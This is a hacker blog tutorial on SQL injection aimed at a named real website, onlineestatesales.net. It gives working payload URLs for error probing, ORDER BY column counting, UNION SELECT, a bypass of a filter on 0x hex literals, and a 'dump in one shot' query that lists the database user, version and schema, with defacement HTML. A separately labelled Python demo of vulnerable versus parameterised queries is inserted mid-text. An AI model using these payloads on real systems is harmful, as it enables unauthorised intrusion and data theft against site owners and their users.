SQL Injection: How to Bypass 418 unused

Hello to all my friends, again I'm Mr.GonzX



Today I will write an article about how to bypass the 418 unused error


Target : https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS

First I check whether this website is vulnerable to SQLi: I put a single quote ( ' ) in the parameter and got an error, and my query looks like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'


That means the website is vulnerable to SQLi :)

Second, fix the error

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'--+-


The error is fixed, so we will use string-based injection

Now we use ORDER BY to find how many columns the query returns

I got 7 columns, and my query looks like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'ORDER+BY+7--+-

Now we use UNION SELECT to see the vulnerable columns, and my query looks like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,2,3,4,5,6,7--+-


So the vulnerable columns are ( 2, 1, and 4 )

Let's try to print a nick, and my query looks like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat(0x496e6a6563746564206279204d722e476f6e7a58),3,4,5,6,7--+-



But I got the ( unused ) error

The problem is the 0x: hex literals starting with 0x are blocked. To bypass this we can use a single-quoted string instead, and my query looks like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat('Injected by Mr.GonzX'),3,4,5,6,7--+-



And yes I bypassed the ( unused ) error :)
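As an added example (not the author's code and not the target's source): a toy Python/SQLite stand-in for a getcategory.php-style lookup, with the string-concatenated query beside a parameterised one, run against the same string-based payload shape the page uses. The items table, its three columns and the payload text are constructed for this demo, and the real backend's layout is unknown; the point is that blocking 0x at a filter changes nothing when a quoted string carries the same data, while binding the parameter removes the injection entirely.

```python
import sqlite3

# Constructed sample schema standing in for the page's getcategory.php backend
# (assumption: the real table layout is unknown; 3 columns keep the demo short).
SCHEMA = """
CREATE TABLE items (id INTEGER, name TEXT, category TEXT);
INSERT INTO items VALUES (1, 'Antique doll', 'DOLLS/TOYS');
INSERT INTO items VALUES (2, 'Tin robot',    'DOLLS/TOYS');
INSERT INTO items VALUES (3, 'Oak table',    'FURNITURE');
"""


def fresh_db():
    """Return a new in-memory database with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_category_vulnerable(catid):
    """String concatenation, as the page's target appears to do: the user
    value becomes part of the SQL text, so a quote breaks out of the literal."""
    sql = "SELECT id, name, category FROM items WHERE category = '" + catid + "'"
    return fresh_db().execute(sql).fetchall()


def get_category_safe(catid):
    """Parameterised query: catid is bound as data and can never change the
    statement's structure, whatever characters it contains."""
    sql = "SELECT id, name, category FROM items WHERE category = ?"
    return fresh_db().execute(sql, (catid,)).fetchall()


# The page's string-based payload shape, rewritten for this toy schema: the
# injected text is a quoted string rather than a 0x hex literal, so a filter
# that only blocks "0x" sees nothing unusual. (Constructed; 3 columns, not 7.)
PAYLOAD = "DOLLS/TOYS' AND 0 UNION SELECT 1,'Injected by demo',3 -- -"

if __name__ == "__main__":
    print(get_category_vulnerable(PAYLOAD))  # injected row comes back
    print(get_category_safe(PAYLOAD))        # []: no category has that name
```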

Let's DIOS (dump in one shot); make sure there is no 0x in your DIOS, and my query looks like this

https://www.onlineestatesales.net/getcategory.php?catid=DOLLS/TOYS'AND+0+UNION+SELECT+1,concat('<img src=%22https://i.ibb.co/3Tp4CzG/mrgonzx.png%22 height=%22150%22 width=%22150%22>','<br>','<font color=%22red%22><b>','Injected by Mr.GonzX','</b>','</font>','<br>','<font color=blue>','<b>','USER','</b>','</font>','::','<font color=green>',user(),'</font>','<br>','<font color=blue>','<b>','VERSION','</b>','</font>','::','<font color=green>',version(),'</font>','<br>','<font color=blue>','<b>','DATABASE','</b>','</font>','::','<font color=green>',database(),'</font>','<br>','<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=coNcat(@x,'<li>',table_name,' :::: ',column_name))))x)),3,4,5,6,7--+-

As you can see, there is no 0x in my DIOS


And I successfully bypassed the ( unused ) error

Thank you for reading our blog


Greetings :

N16H7 CR4WL3R
TROY
Cyb3rFr0st
Illumni
Mr.Krungx